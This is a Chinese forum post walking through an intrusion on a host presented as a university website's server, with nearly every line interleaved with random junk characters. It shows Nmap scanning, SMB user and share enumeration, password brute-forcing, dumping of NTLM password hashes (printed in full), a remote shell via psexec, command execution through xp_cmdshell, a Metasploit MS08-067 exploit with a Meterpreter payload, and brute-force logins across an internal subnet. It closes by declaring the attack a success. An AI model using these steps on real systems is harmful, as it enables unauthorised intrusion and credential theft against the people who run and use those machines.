广西师范网站http://202.103.242.241/
5 i7 A8 z5 t C# P, E9 f4 p, I6 Q6 T3 K4 n/ v6 S
root@bt:~# nmap -sS -sV 202.103.242.241
, g2 ~* V4 K0 K o2 D
& e! \1 T9 n. |: Y# Q# H3 Q# {! uStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
% b ^8 r# }! b5 v1 S+ Q6 a) w8 }$ u$ M+ [' W' ^3 f# T7 r
Nmap scan report for bogon (202.103.242.241)
, Q$ e/ N8 n1 W% p/ B! w5 B D+ Q: {" D! \( J
Host is up (0.00048s latency).6 T6 e5 m+ }: \7 S& p' V- T
6 r" ]; n6 K) L; {5 r
Not shown: 993 closed ports+ Z- A, m3 b7 c; C
: s5 s; O d9 E; P- w" cPORT STATE SERVICE VERSION. c# d5 A5 i. b2 q5 w
# m8 v; A5 K' J& R" }# C: X1 f
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
( f" |' m" ?) p6 C. E: a. W) a2 S9 {7 t8 B9 q# {* `1 P4 J. n) D
139/tcp open netbios-ssn
2 c7 E& d# R5 c$ o" o9 y7 C: t {+ z5 p% E$ V. y
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds6 O7 l( M! m5 }5 J0 w/ _- o
, j2 ]# p7 }, O! z+ I
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( ~: _: T3 |! E8 U, N, X1 X
- B" N3 z5 e6 U3 e5 i
1026/tcp open msrpc Microsoft Windows RPC
* y* a0 j! n$ P% h! e- [: f' z! w% Z3 A: S
3372/tcp open msdtc?9 F; D; u M4 M" p" r
8 i- u- F1 R% E* S1 f- T' a7 J3389/tcp open ms-term-serv?5 Z* W) n2 j5 q+ Q
9 @7 \& ?6 m0 x9 a# U& L1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
5 P: } @* k4 [) S8 q8 e1 |SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
3 b( `2 G, G: X: ?" f& K# _- D0 \: n* ^; n, {
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions2 {" m; T6 k" y$ g7 k. y- h* x
9 _5 M2 P' `5 Z3 N" P
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
i/ q3 [0 C- q: H+ A! @3 s1 D0 g( z8 e
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO3 [" f! u* h" S& A
, d7 H! p0 h' j! Y* h
SF:ptions,6,”hO\n\x000Z”);1 T' ]5 x( Z# Q
1 c# o/ A2 d: A0 q0 ^3 Q7 x
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); h6 u! I+ r) T3 f* \* Q8 Y8 E
1 C1 {8 {$ z# w; BService Info: OS: Windows2 q1 Q3 |6 ]" Z
3 n- }* b# B7 `Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
$ c# d! k( Z9 g5 x' ^' M3 z# l2 V7 H9 G+ M7 H# R. I e
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
4 Z# c; t- }3 Y( f9 c3 ~$ a9 c' b% N! i/ Z6 v9 d9 [
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本( P8 X1 S' X- J* ]7 P3 B; ~/ {, ?8 [
, X3 R5 w7 t' F8 [$ F z
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse* d' S6 L# `6 B# }5 o$ K
- e+ q9 N- J! N5 i4 [-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
" }! V" W4 e4 ~! H+ l7 {7 [$ W# k! n1 f. e [ J2 e
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse9 ]9 e7 R$ K( ~) N: k" F, D1 |
4 l) b1 x( P9 h* v, m) m9 M! W$ J+ I4 `-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse9 T' l* f! u( R7 x1 Q. j
! Y& N% [* F }0 {-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
# O. k) g& T" m6 j
- r: a) @0 j, `6 C# \-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, f( }# B2 v( E4 _7 Q. u/ h7 _2 y! p
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
% t8 | O4 \1 D8 y: v
8 p) T( |0 E5 n-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse0 Z) m$ `0 `9 n" j1 T) \
0 i: h5 r" U) V
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
6 S8 X, n1 g7 }& q( L8 h
2 }- E: {' V. o, \6 \" v1 ]# U-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
' H" ?/ L4 h9 O+ I$ P, R# n) A; |/ \0 F) E
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
! V- @& `- }7 q8 H# ^0 N( z' ^* U1 x' v
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse- N) a H3 i9 W8 Z1 V7 V# |1 g \
8 M* d9 }8 ^5 J" s4 V- D-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
% o9 I& l, f* g! Q$ C3 Z$ b. ~& E. [/ [- v2 W2 ~+ G& f
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
3 t# L: \$ s+ C6 u) Y
5 s7 H( E; ^: z+ c8 M1 D-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse6 F* R* f _/ b; L9 |
" Y- m# ^8 d& t9 T" }* ^ rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
- v0 d9 r! J# u6 L3 J
6 k9 X& n4 x+ p# f$ {5 O4 \//此乃使用脚本扫描远程机器所存在的账户名
7 T3 p* l, ?$ s9 [0 [ Y$ y1 ]; K; _6 b; {& W/ O( ]1 s
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
! u8 H6 I1 @9 Q, v ~$ L' L3 C
! I. J& h& I& s$ ~Nmap scan report for bogon (202.103.242.241)
/ O$ m# P3 P9 ^ i- o
& o* I( o, f9 w( P4 vHost is up (0.00038s latency).6 p, T) f6 n; {: i: w; ~
8 i2 b5 Z8 K# {, W! a. t
Not shown: 993 closed ports
) \ V) Q8 \, [- `- q$ x
- ?) G" p c5 R% JPORT STATE SERVICE
0 ^+ E+ ^9 J+ h$ F0 y0 U) u4 U$ G3 m, E! n1 i. W# \
135/tcp open msrpc8 E& e! r2 O* t4 N( ]
: ]& A( x4 E+ Q# ?5 [3 I
139/tcp open netbios-ssn3 ]9 t& G$ W7 M1 R r
* j& k- B3 @1 H: Z0 \ f
445/tcp open microsoft-ds+ R* d0 k4 ?! x8 r( M: Z$ j
3 P m! X( J5 X# v9 i1025/tcp open NFS-or-IIS
+ X+ F* D8 R$ U$ k" E! S/ a, @9 t( \0 u1 O x
1026/tcp open LSA-or-nterm4 M' c+ Z" l. A7 ]9 x2 `! o h3 Z4 x
0 D; m' ?7 A- a9 o m0 `
3372/tcp open msdtc0 |1 p1 |1 f3 l) {
4 U3 X) g0 W5 m2 E3389/tcp open ms-term-serv) X m$ p: [8 r0 R, N6 @6 H- j
. e6 G% K, H# x9 S3 t9 V( d U% |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- ]( U' V' t9 @" v4 N! G0 |1 \# P
$ \2 g; p, {& Q7 g+ \Host script results:
@* u+ r2 z! e5 ~' K: |
4 |% P+ k! R5 V- O| smb-enum-users:
8 C, h, o+ h+ i" K2 Z
6 f6 L9 P) G2 o|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
+ p/ x0 N% ~" m# L
. ^! ~& b8 l3 m xNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: x( b) V& R5 L- Z! B9 m- W" u
/ k; D6 X. D) N9 U/ d+ X' Rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
6 r8 ^% i5 @" f9 Q; ~0 x+ s* f; a" E0 ` h5 P5 z& j6 T
//查看共享
" a, B2 L: z( }1 `1 E5 a0 o R- F7 |0 V( [ I3 y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
; y9 i9 J+ Y e/ X. {: \' C D- S/ L' F0 l1 i% e! d3 F
Nmap scan report for bogon (202.103.242.241)
2 s0 b) L4 E2 x( H1 X b" W. t
3 k& N% S9 a7 A# l: U0 SHost is up (0.00035s latency). B) }4 Q% ~$ T9 ^. X. A
6 Y/ u% y2 Z+ j, r% _' hNot shown: 993 closed ports* Q4 ]+ L/ b, [1 B
J. P: T w; m( J3 u( k& Y; @PORT STATE SERVICE
+ d& v) ~; I5 u0 Y8 n' V% J# }' P; q- x( `' y$ W0 @- P& U/ E
135/tcp open msrpc: ?) s9 F* h& M
2 W( ~# ?/ c. i- k) _# D* \
139/tcp open netbios-ssn
6 c/ C* Y; M% M7 Y% E, R& C/ a: X' Q B/ S( v" b& d) ~$ ^) g
445/tcp open microsoft-ds9 G6 ^& ^% i1 O% r" k' @" f2 [
/ M1 l# Y9 q. E. \
1025/tcp open NFS-or-IIS
H3 @( b4 ?) d8 j& ^. o6 ?' y# l; l7 M- h7 v3 F
1026/tcp open LSA-or-nterm7 C! a* ~0 m) p- O
4 D! L3 t# E: k; _- v3372/tcp open msdtc) p2 f8 R: d5 X8 E; v0 x
$ ?$ [, ~# y' ^ S7 d! V/ S& r/ {5 ?3389/tcp open ms-term-serv
/ L7 m0 f ~" |, N& _& F% R1 I' U
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: c0 I/ m- c; q+ j. A6 m1 F4 \1 K, i2 S# b8 e
Host script results:
4 R4 ~, o, @1 r% n; ~
# {1 S/ i0 m0 m1 y4 P7 @| smb-enum-shares:
! _+ H/ B7 D' Q1 R) k: h) a
" s: P/ H s0 Y6 j| ADMIN$( n& {7 w" N3 P3 n2 m
# l7 e4 g, q/ K$ Z2 N- P
| Anonymous access: <none>
6 t8 }% q k, T) k
# L( y: B8 H4 G2 u+ F5 R2 z. b8 ?/ s| C$
% J9 T3 T0 H0 E; n- x$ U
7 w6 y7 R0 P% U9 y| Anonymous access: <none>. _2 h2 m0 ^. K' ]! c* D) u
- p8 _/ o8 t/ L- p, v p4 ?| IPC$
6 n6 C/ ^9 @5 a5 _3 P' i% d7 i% n5 |3 T" D
|_ Anonymous access: READ: X0 W. z( D& R. R% O: y. p
% o8 p9 w! B- s" Z/ YNmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 _6 H8 B7 o$ X( k( m2 l! c
7 r3 A4 X; e$ S
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
0 Y7 K; w- ^- A: \" q
' C5 Y2 Q, B$ c$ e3 B' t0 R% G i//获取用户密码6 `7 Y( f4 f) @" d4 Z) a1 m4 m
, j2 p) x3 F" ~4 l# K, DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST' J! l7 U. I8 a+ O. v7 M
1 K- I3 f- v$ r. \6 \; v0 ZNmap scan report for bogon (202.103.242.2418)
' e5 [; i) h# ]- d* S% m! x8 ^: G8 N* j' N/ o
Host is up (0.00041s latency).
. K' n6 {7 C1 S6 ?! F" X8 @: Q- u% r/ x# U! X: X
Not shown: 993 closed ports
) e: I, g3 `! W4 T
; |+ y# b* h& C3 x3 ^! VPORT STATE SERVICE
. j f; ?" J7 K2 X0 c6 Y
4 |& Q' v4 W4 F( ^135/tcp open msrpc0 v+ E: V% c7 m
( P: _ X( a2 s! h$ W/ d
139/tcp open netbios-ssn
9 W. C3 H/ r0 ~$ f' r
% i/ D$ b, e9 @445/tcp open microsoft-ds
' |$ |. u* K2 Z9 f2 l* q: p! K) f- e! B0 z
1025/tcp open NFS-or-IIS: F3 u& ^: o4 B
; j* R! E& D2 x1026/tcp open LSA-or-nterm6 ?" ?) w5 ?9 M* `7 \
* u, t- a1 f5 C$ d& X1 ~( V
3372/tcp open msdtc
" }7 H9 g0 a. S3 g9 Y5 }
/ W0 u( B: n" Y+ o) k3389/tcp open ms-term-serv! J( {7 O. }% L8 m3 l. Q9 T5 L% H
) p3 Q/ G& V( j( t) F8 c1 g; b) A% h
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" Z' [; n; { _3 Q$ N. v
/ x8 O$ e8 n2 J0 `% t7 eHost script results:5 ~/ J' P) r* J9 m; F
4 c& W% q7 G4 l& B5 ~0 A. M, x
| smb-brute:
9 g% }! ]! Z% c% p0 `! z( Y( V2 b6 r P# M& ]5 I( _- ?/ P3 s$ Z
administrator:<blank> => Login was successful
2 T' x5 ~( v2 O1 a# N+ R* C, B: O1 Z" k; e# i$ @6 i
|_ test:123456 => Login was successful
# f0 V6 x' d9 `# {" S5 q6 U1 `3 B0 \
( e. U; g$ Y7 ?( b* sNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
+ o9 U5 E6 d3 g- B. z1 `, V, R+ Z* s3 t6 @3 j* D- {3 R
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
, P. D6 C) p; n6 {' i+ \4 M
. Z+ X' K' f+ \% D( _root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data; g/ `' e* z' U/ k$ K
% Z8 N. H& w& \2 b8 t7 @4 Jroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
( m& {+ T6 h! o
0 U( u0 }# d! @! g4 zroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1394 T( h# j: k. @. s% H' D
: J* N) E3 k( j5 ~' N* X/ ]1 h7 l9 AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST. C4 |3 m/ s0 }4 j4 b
: A3 p6 f T K0 E7 \Nmap scan report for bogon (202.103.242.241)
/ Y4 A3 M6 \, X6 |
% H6 Y1 h) }- }/ [: e L0 GHost is up (0.0012s latency).2 J& r4 J/ ], M! @. K: M
5 P1 \/ |9 G0 }# R8 j
PORT STATE SERVICE
7 V) D; y3 }, T# ]% G* g; G1 c* [, j4 j% ^
135/tcp open msrpc
3 ]8 u9 z/ f( }& K/ _* P- u# Z/ c8 U. T/ V; N6 p
139/tcp open netbios-ssn0 m; h. ~$ u2 [0 S3 Q: L: ^
3 M7 x# p1 ^- G* s( g9 C445/tcp open microsoft-ds
6 P% A5 @; ]# G1 r# i$ `* r# R- b/ B$ ]) _: @3 {
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 n0 T3 H. @' s0 [4 d
# _$ d% a' G, p# F$ I" p/ ~$ i
Host script results:# J. `7 e; r6 X& z) [( o# K
6 |; H5 J. G. P7 w3 c# i' s
| smb-pwdump:
& D* C9 R5 C, X1 h+ v6 C/ |2 C2 _. J! ~0 |; i5 k
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************9 R3 U2 ~3 F4 k" B1 R# r j
1 [9 n$ e3 C; N; F. R |0 v5 a| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
9 _( Y& j! F. O- z) x9 [4 c/ ^
* R- n" }* P9 E6 y$ R: p. q) I5 V| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
2 C) \8 W- f( r. u4 O" R/ [7 n: u: N. m& b1 k' z1 _5 q7 q
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
9 ^* j+ @9 V1 I7 Q! l; o1 \0 |! y* J
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
. q0 }3 q5 O. M% }: i# ]) i# t+ W- n1 a( R( v) V
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
6 `/ S: x# p }, N5 G- I% d+ L% Z$ C5 M y$ o" [: U
-p 123456 -e cmd.exe" j: d) o; j, j0 @% l _3 f" I
' u9 @+ t$ r& A, r* n( F5 R$ ^, NPsExec v1.55 – Execute processes remotely4 y: \; u$ M0 l/ y# |( D2 M Q+ B
$ X% x/ `( z* ACopyright (C) 2001-2004 Mark Russinovich
! C1 F8 q5 r- b0 z1 O, P9 v# G8 \) l% \3 V5 u2 ^
Sysinternals – www.sysinternals.com: S# `$ z: v3 y: N# g8 G: @" H" E; C
* e! E+ J0 z/ k g: J/ sMicrosoft Windows 2000 [Version 5.00.2195]
# \+ @( g8 S' ^: F* @/ |7 ] S5 j9 u8 K" A" n+ K! B4 I. k2 v6 I" ?
(C) 版权所有 1985-2000 Microsoft Corp.
9 @! l4 ]: G4 U) u4 h& N
( R$ y. A" l* J, ?7 s: VC:\WINNT\system32>ipconfig
" h/ l# s5 d1 Q; B7 y% E& u& q) \+ R0 R# X0 g4 m
Windows 2000 IP Configuration
. a, y5 M! y E n3 \# @3 I7 L" c& ~5 R4 ~% F. p* k4 H
Ethernet adapter 本地连接: o/ A6 T# m5 y3 ^* Y: x
/ |9 Y6 I c1 [3 H, f b- Z* A
Connection-specific DNS Suffix . :3 b. I5 s7 R3 `9 h- D
& J! G( |; m4 g9 ]IP Address. . . . . . . . . . . . : 202.103.242.241
8 S! y; D- B0 \" u2 u- Y
" q) P% ?6 D$ Q) a- }% q( F8 RSubnet Mask . . . . . . . . . . . : 255.255.255.0
5 |& j# [! T5 ?3 z D
$ ^* a0 O1 k: M% y# g \- M" [Default Gateway . . . . . . . . . : 202.103.1.1
, _3 ?! q. |5 k+ z+ U! Z' g5 S0 S( q& y1 |. _$ V6 i/ P5 i
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令+ z7 |, L+ n' V* R* r) X% Z0 ~8 ?
5 |0 u. Y( Q: N# s; d
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
- h! \" p9 Q% Z8 l" u
0 b2 I( L4 m. \3 D6 ~' p: ~$ `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST2 G( F+ \# L$ V) m! q& S
8 q% l0 j7 E0 I# jNmap scan report for bogon (202.103.242.241). A8 C) \5 @/ T3 H0 [
) P' l2 ]. T1 x) P% b0 aHost is up (0.00046s latency).$ t# `# ^) |! ~0 `/ N" A! d
! J% N Y& @1 u" p! S; |0 RNot shown: 993 closed ports
1 J+ ~7 d! {& _4 C0 a1 b
3 t6 D, ]; }6 F! s2 m8 P B- z6 YPORT STATE SERVICE
( f, i! J8 R2 a1 F b) u3 { m$ V, f1 F1 }/ [, p
135/tcp open msrpc
7 l2 n. Y0 P9 J' r8 D1 Z. X& e
- V" v T5 O1 j! x7 d139/tcp open netbios-ssn
" L, N0 S4 k4 }- o( _6 c/ s* n% u8 A/ g( k
445/tcp open microsoft-ds- b; F; D$ ?) l4 t' y" D1 J
: T" X1 _/ g1 N0 p
1025/tcp open NFS-or-IIS( A& X! b2 t$ j* R! G
: M3 C: y# Q7 n: M8 k9 M
1026/tcp open LSA-or-nterm$ Q. T1 z: b' _: d+ @$ `) t: T
: B3 Z2 `" M6 ]4 t0 p
3372/tcp open msdtc
1 x: \* k# G( R: f$ o; H- t7 {5 ^/ A# u# ^4 ~/ r) j& p& V4 ~
3389/tcp open ms-term-serv) K- I) M0 @* d! ^" a2 {+ e
# }- y0 w9 ?' n) ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ F& I' @+ s7 t5 W3 S9 z) h
9 [1 |9 U' A/ n& @
Host script results:( h5 O8 T" f; p( R' y8 x1 C
$ X! A- r0 E$ V J& H, b$ y" R
| smb-check-vulns:
! X+ L" L$ C7 ]; e) E' W1 _; k
G+ R8 I2 w7 A) i- q|_ MS08-067: VULNERABLE
; a2 V" d* B6 W& ?) P- e# P* G8 G& L0 u" C3 ]4 e/ R# I0 D+ _
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds \1 n* v2 F' s/ ^' j
9 t# E1 O* u2 U/ t3 J3 h' B% j; Yroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
; H% ], s' ^( O3 }( W; T+ I! A% A$ D1 W) P
msf > search ms08
, ?% J7 V& u" P' K+ \0 R% F! o+ _7 Q
1 V4 j$ n) g. Q# R5 s; p+ ?msf > use exploit/windows/smb/ms08_067_netapi
2 O: l! G2 c4 M4 M# O% t& r6 f& v' `% K& G5 h
msf exploit(ms08_067_netapi) > show options
8 w. F% \) c4 w% |' }* ^( e4 {9 @- l7 h
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
$ C1 [4 x6 c- [" Q5 l
, ?5 q7 z8 C3 `+ g) z6 u8 g8 Umsf exploit(ms08_067_netapi) > show payloads5 o9 G. u/ U- {9 u' B
1 _& A# G D( G3 Imsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
( o5 V5 W; e/ P0 I. O! Y6 I: w) c) l0 f& r5 x5 t2 I6 Z
msf exploit(ms08_067_netapi) > exploit
, L' f2 w" {& ]' O. Q Z c9 r2 ]1 M& h
meterpreter >
2 _( t" I2 B+ ^' X
2 L1 f' J" d/ t5 _Background session 2? [y/N] (ctrl+z). n+ M. n8 ~) G) z3 U y; E
; [% o% t1 \! ymsf exploit(ms08_067_netapi) > sessions -l
1 p" g; N& D0 V* D4 ~. t/ q1 ~5 n4 q
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt- J6 C. ^7 v g' E, w4 H! Z E# R
+ I, n+ k. T! }- g/ u" e0 b* I
test" E/ X( I2 K* l0 e
" n7 Y! l- C- d2 K9 zadministrator6 U5 U- V9 D% u/ t6 X
5 W' J( T% o/ _
root@bt:/usr/local/share/nmap/scripts# vim password.txt
* J H b0 l4 I2 A! L- a
' A: `/ k3 D; u, Q( c44EFCE164AB921CAAAD3B435B51404EE
^( ?5 F, u% o4 o0 ^0 e4 l# X
$ T! s7 v5 [% Y) n4 X( Z6 Q0 uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
* v( l4 n2 q1 _5 A$ \ c
4 b5 \, h- l% M/ \2 _5 z$ p //利用用户名跟获取的hash尝试对整段内网进行登录
: L3 c' g$ B- ~7 M6 G; I" k
, m) g% r5 l' p! k8 lNmap scan report for 192.168.1.105
8 c' a+ ]2 K, [, j) T% s) a* Z6 |( g4 n" @) n2 L5 X. N
Host is up (0.00088s latency).
1 c; z b3 V' H' B1 ]$ t' d7 p$ }6 i) w
Not shown: 993 closed ports0 s$ A q" W) l! o
: W N. `% \) h9 h' V
PORT STATE SERVICE
2 K; c( X( V; B5 v+ u
6 @+ c# F3 }% `- p4 P9 _135/tcp open msrpc8 i) x) M! g( o( e- p0 Y
& K2 {, l' p; n* |
139/tcp open netbios-ssn
; V: x9 b7 N! G' i" r* _
. n. [+ Z$ O* s- t& [) |! ]445/tcp open microsoft-ds2 M- |: X9 m, [3 q; d3 O) L
0 H' H" x4 }1 O2 `' j: W% b1025/tcp open NFS-or-IIS2 I/ T2 o( [( P" \
% v$ _4 X2 J5 T `& M
1026/tcp open LSA-or-nterm
& p* m% i) o7 ?& O3 M! h" P4 z5 N- ^7 [4 m5 a
3372/tcp open msdtc
$ M2 |, T! G" h* N b, a& {3 W
& |. a4 E% e/ [/ e$ @! K3389/tcp open ms-term-serv, P: S4 U" @( i; q
4 p" E, d8 B# N4 S0 I
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 O* ~0 d" b6 a- c
- ?; [- I- O' ]3 U- jHost script results:
. H) O$ ?+ A& C8 r3 q' ]
& k U" f# F3 l9 Q+ {" u8 n2 G| smb-brute:
, y, Q Q8 q- V Y' ]4 \) r# l2 b$ I! W+ b" @3 T1 b
|_ administrator:<blank> => Login was successful0 j- |0 B1 i3 z, T3 f. I1 g7 q
; l W) _( |6 }$ ?/ {0 K# N攻击成功,一个简单的msf+nmap攻击~~·9 z2 A$ |2 S- b" p- N, W
; k! \6 A$ w6 @" L9 K' l; d |
发表于 2012-12-4 12:46:42
收藏
支持
反对